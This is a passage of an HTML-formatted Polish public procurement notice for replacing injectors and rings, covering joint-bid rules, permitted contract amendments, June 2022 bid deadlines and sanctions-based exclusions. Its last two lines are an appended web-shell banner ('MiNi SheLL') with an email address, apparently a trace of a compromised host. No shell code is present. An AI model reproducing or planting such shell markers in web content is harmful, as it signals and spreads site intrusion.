class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wspólne ubieganie się o realizację zamówienia (konsorcjum, spółka cywilna, itp.)<br/>1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy ci ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>2.	Zapisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (np. konsorcjum, spółka cywilna):<br/>1)	oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp (o którym mowa w rozdziale X ust. 1 pkt 2) SWZ), składa każdy z wykonawców (oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu), <br/>2)	podmiotowe środki dowodowe określone w rozdziale IX ust. 3 SWZ (odnoszące się do warunków udziału w postępowaniu) mogą być złożone wspólnie w imieniu wszystkich podmiotów składających ofertę wspólną,<br/>3)	podmiotowe środki dowodowe, o których mowa w rozdziale IX ust. 6 SWZ (odnoszące się do podstaw wykluczenia) powinny być złożone przez każdego z Wykonawców,<br/>4)	formularze winny być złożone w imieniu wszystkich podmiotów składających ofertę wspólną.<br/>4.	Oferty przedstawione przez dwa lub więcej podmiotów występujących wspólnie, będą musiały spełniać następujące wymagania:<br/>1)	w przypadku złożenia oferty wspólnej, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, <br/>2)	oferta będzie podpisana w taki sposób, by wiązała prawnie wszystkich partnerów/wspólników,<br/>3)	każdy Wykonawca przedłoży tylko jedną ofertę, sam lub jako partner w konsorcjum (wspólnik spółki cywilnej); Wykonawca, który przedkłada lub partycypuje w więcej niż jednej ofercie spowoduje, że wszystkie oferty z udziałem tego Wykonawcy zostaną odrzucone.<br/>5.	W przypadku gdyby wyłoniona w prowadzonym postępowaniu oferta została złożona przez dwóch lub więcej Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. Termin, na jaki została zawarta umowa Wykonawców nie może być krótszy od terminu określonego na wykonanie zamówienia.<br/>6.	Oferty składane przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, spółkę cywilną) w odniesieniu do warunków udziału w postępowaniu, o których mowa w rozdziale VI ust. 2 SWZ i pozostałych wymagań określonych w SWZ zostaną ocenione pod kątem łącznego spełniania wymagań Zamawiającego przez występujących wspólnie Wykonawców, z zastrzeżeniem ust. 3 rozdziału VI SWZ, na podstawie złożonych przez nich oświadczeń i dokumentów. <br/>7.	W przypadku wspólnego ubiegania się o realizację zamówienia, Zamawiający wymaga, aby co najmniej jeden Wykonawca spełniał warunek udziału w postępowaniu, o którym mowa w rozdziale VI ust. 2 pkt 4 SWZ (warunek doświadczenia) w pełnym zakresie. <br/>8.	Zgodnie z art. 117 ust. 3 ustawy Pzp w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. <br/>9.	W przypadku, o którym mowa w ust. 8 powyżej, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>10.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający wymaga, aby prace związane z wymianą (rozmieszczeniem i instalacją) wtryskiwaczy i pierścieni wykonane zostały przez Wykonawcę posiadającego doświadczenie, o którym mowa w rozdziale VI ust. 2 pkt 4 SWZ w pełnym zakresie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 3.	Na podstawie art. 455 ust. 1 pkt 1) ustawy Pzp Zamawiający przewiduje możliwość następujących zmian umowy: w zakresie terminu realizacji umowy, przedmiotu zamówienia, wynagrodzenia, płatności, oznaczenia stron, i których konieczność wprowadzenia wynikać będzie z następujących okoliczności: <br/>a)	zmiany dotyczące sposobu wykonania przedmiotu umowy, przedmiotu umowy – w przypadku, w którym służyć to będzie podniesieniu standardu przedmiotu zamówienia lub zmiany te będą korzystne dla Zamawiającego, i nie będzie to wykraczało poza określenie przedmiotu zamówienia zawartego w SWZ ani nie zwiększy wynagrodzenia Wykonawcy; <br/>b)	zmiana dotycząca terminu wykonania przedmiotu zamówienia, godzin świadczenia usług, przedmiotu zamówienia, jego zakresu, wynagrodzenia Wykonawcy, jego rozliczenia oraz obowiązków Wykonawcy – w przypadku wystąpienia okoliczności nie przewidzianych w chwili zawarcia umowy, a skutkujących koniecznością ograniczenia przez Zamawiającego zakresu przedmiotu zamówienia; <br/>c)	zmiana dotycząca terminu wykonania przedmiotu zamówienia, przedmiotu zamówienia, jego zakresu, wynagrodzenia Wykonawcy oraz obowiązków Wykonawcy – w przypadku wystąpienia zmian w harmonogramie rejsów uniemożliwiających wykonanie zamówienia w pierwotnie określonym terminie; <br/>d)	zmiany dotyczące terminów przewidzianych w umowie – w przypadku, w którym nie ma możliwości dotrzymania przez Wykonawcę tych terminów z przyczyn niezależnych od Wykonawcy; <br/>e)	wystąpią zmiany w nazwach lub adresach stron, zmiany związane z przekształceniem podmiotowym stron – w zakresie związanym z oznaczeniem stron umowy,<br/>f)	zmiana dotycząca wszelkich warunków i sposobu wykonania przedmiotu zamówienia – w przypadku wystąpienia okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;<br/>g)	zmiany w oznaczeniu stron – w przypadku wystąpienia zmian w nazwach lub adresach stron, zmian związanych z przekształceniem podmiotowym stron;<br/>h)	zmiany dotyczące terminów przewidzianych w umowie – w przypadku konieczności prowadzenia działań przez osoby trzecie uniemożliwiające wykonywanie przedmiotu zamówienia, które to działania nie są spowodowane przyczynami leżącymi po stronie Wykonawcy; <br/>i)	zmiana wysokości wynagrodzenia – w przypadku urzędowej zmiany, w okresie trwania umowy, wysokości wskaźnika podatku VAT (także obniżka);<br/>j)	zmiany umowy są konieczne w związku ze zmianą odpowiednich przepisów prawa – w zakresie wynikającym z tej zmiany, <br/>k)	zmiany umowy są konieczne na skutek działania organów administracji lub instytucji upoważnionych do wydania decyzji albo innych aktów władczych lub nadzorczych, związanych z realizacją przedmiotu umowy – w zakresie wynikającym z tej zmiany.<br/>4.	Warunkiem wprowadzenia powyższych zmian jest wykazanie przez stronę zainteresowaną wprowadzeniem zmian wystąpienia powoływanych okoliczności.<br/>5.	W przypadku zmian obejmujących swym zakresem zmianę wysokości wynagrodzenia Wykonawca zobowiązany jest wykazać wpływ powołanych okoliczności na wysokość wynagrodzenia z tytułu wykonania przedmiotu niniejszej umowy.<br/>6.	W przypadku zmiany, o której mowa w ust. 3 lit. i) powyżej wartość netto wynagrodzenia Wykonawcy nie ulegnie zmianie, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-09 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Składanie ofert odbywa się przy użyciu miniPortalu: https://miniportal.uzp.gov.pl/. 2. Ofertę wraz z załącznikami należy złożyć za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku (dostępnego na ePUAP i udostępnionego również na miniPortalu). Wykonawca zamierzający złożyć ofertę, musi posiadać konto na ePUAP.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-09 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zgodnie z art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, z postępowania o udzielenie<br/>zamówienia publicznego wyklucza się:<br/>1) Wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy;<br/>2) Wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r.<br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w<br/>wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim<br/>beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu<br/>na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy.<br/>2. Wykluczenie, o którym mowa w ust. 6 następuje na okres trwania okoliczności określonych w tym ustępie.<br/>3.	Zamawiający nie wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących czynności w zakresie realizacji niniejszego zamówienia na podstawie art. 95 ust. 1 ustawy Pzp.<br/>4.	Zamawiający zastrzega, iż prace związane z wymianą (rozmieszczeniem i instalacją) wtryskiwaczy i pierścieni wymagają osobistego wykonywania przez Wykonawcę. <br/>5.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający wymaga, aby prace związane z wymianą (rozmieszczeniem i instalacją) wtryskiwaczy i pierścieni wykonane zostały przez Wykonawcę posiadającego doświadczenie, o którym mowa w rozdziale VI ust. 2 pkt 4 SWZ w pełnym zakresie.

Creat By MiNi SheLL
Email: jattceo@gmail.com